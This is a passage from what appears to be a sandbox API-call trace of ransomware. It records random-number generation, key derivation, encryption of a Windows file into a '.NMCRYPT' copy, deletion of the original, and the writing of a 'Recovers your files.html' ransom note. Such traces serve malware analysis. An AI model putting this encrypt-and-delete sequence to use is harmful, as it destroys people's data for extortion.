| out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.248] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.249] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.250] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.250] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.251] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0159.251] CryptHashData (hHash=0x9ad338, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.251] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad338, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x9ad878) returned 1 [0159.251] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0159.251] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0159.251] wcslen (_String="\\\\?\\") returned 0x4 [0159.251] CryptDuplicateKey (in: hKey=0x9ad878, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad2b8) returned 1 [0159.251] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\chstic.dgml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0159.252] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\chstic.dgml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0159.252] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=763) returned 1 [0159.252] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0159.253] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.253] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.254] GetLastError () returned 0x0 [0159.254] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.254] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.255] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.255] GetLastError () returned 0x0 [0159.255] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.255] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0xfb, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0xfb, lpOverlapped=0x0) returned 1 [0159.255] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0xfb, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.255] GetLastError () returned 0x0 [0159.255] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.255] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0159.255] WriteFile (in: hFile=0x588, lpBuffer=0x2901230*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0159.255] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\chstic.dgml")) returned 0x20 [0159.255] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml", dwFileAttributes=0x20) returned 0 [0159.255] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml") returned 1 [0159.255] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\chstic.dgml")) returned 0 [0159.256] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml" [0159.256] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel") returned 1 [0159.256] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\.xXE164.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\.xxe164.tmp")) returned 0xe164 [0159.256] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\chstic.dgml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\.xXE164.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\.xxe164.tmp"), dwFlags=0x1) returned 0 [0159.256] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\.xXE164.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\.xxe164.tmp")) returned 1 [0159.257] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0159.257] wcslen (_String="OK") returned 0x2 [0159.257] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.257] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.257] CryptDestroyKey (hKey=0x9ad878) returned 1 [0159.257] CryptDestroyHash (hHash=0x9ad338) returned 1 [0159.257] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0159.257] FindNextFileW (in: hFindFile=0x9ad178, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0159.257] GetLastError () returned 0x12 [0159.257] FindClose (in: hFindFile=0x9ad178 | out: hFindFile=0x9ad178) returned 1 [0159.257] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0159.258] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

